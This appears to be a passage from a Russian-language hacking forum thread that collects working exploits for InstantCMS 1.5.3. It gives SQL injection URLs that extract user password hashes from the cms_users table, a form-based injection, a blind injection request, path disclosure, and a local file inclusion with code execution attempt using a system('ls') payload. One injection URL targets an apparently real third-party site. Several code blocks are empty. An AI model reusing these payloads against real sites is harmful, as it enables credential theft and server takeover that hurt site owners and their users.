![]() |
InstantCMS
version : 1.5.3 http://www.instantcms.ru/ SQL-INJ : Код:
/admin/index.php?view=components&do=config&id=6&opt=edit&item_id=-1+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6+--+ |
InstantCMS
v 1.5.3 SQL Injection Уязвимость в /components/photos/frontend.php PHP код:
передача своего запроса методом POST в http://localhost/?view=photos&do=view. (перед этим надо зарегистрироваться и авторизоваться) P.S. иньекция после order by :( |
InstantCMS
1.5.3 SQL INJ localhost/components/forum/fronted.php PHP код:
Код:
http://localhost/?view=forum&do=newthread&replyid=-29+and+1=1+union+select+1,2,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM cms_users+--+Код:
http://kokshetau.kz/?view=forum&do=newthread&replyid=-29+and+1=1+union+select+1,2,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20FROM%20cms_users+--+SQL INJ Требования : доступ к админке. Код:
http://localhost/admin/index.php?view=components&do=config&id=7&opt=edit&item_id=-16+and+1=1+union+select+1,2,3,4,5,6,7,password,9,10,11+from+cms_users+--+ |
InstantCMS
1.5.3 SQL INJ components/users/frontend.php PHP код:
Вы должны быть авторизованы Использование: Код:
<form action="http://localhost/?view=users&do=sendmessage&replyid=-100+and+1=1+union+select+1,2,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+cms_users+--+" method="post"> |
InstantCMS
1.5.3 SQL INJ В админке: 1. Код:
http://test1.ru/admin/index.php?view=components&do=config&link=banners&opt=edit&item_id=-100+and+1=1+union+select+1,2,3,4,5,6,7,8,9,10,password,12,13+from+cms_users+--+Код:
http://test1.ru/admin/index.php?view=components&do=config&link=board&opt=edit_cat&item_id=-100+union+select+1,2,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+cms_users--+P.S. Раскрытие пути Код:
http://localhost/admin/modules/mod_arhive/backend.php |
Blind SQL-Injection
Blind SQL-Injection
/componets/catalog/fronted.php PHP код:
Код:
POST http://instantcms/catalog/23/1 HTTP/1.0 |
1.5.3
LFI + Eval Code Execution! /admin/includes/cp.php PHP код:
http://instant/admin/index.php?view=cats[lfi] Example: http://instant/admin/index.php?view=cats\..\..\..\..\.htaccess[. т.д] http://instant/admin/index.php?view=cats\..\..\..\..\.htaccess%00 Модуль может быть другой! Условие: - админка; - только \. |
Цитата:
?applet=;system('ls');rand Или там что-то мешает? PS И кстати, да у меня тут хакеры спрашивают WTF??? $link= str_replace('/', '', $GLOBALS['applet']); а потом view=cats\..\..\..\..\.htaccess Выкладывай весь необходимый код, ибо нихрена не понятно |
Цитата:
/admin/index.php PHP код:
|
Просто Джокестр,не смотрел код, там в индексе
PHP код:
|
| Время: 21:00 |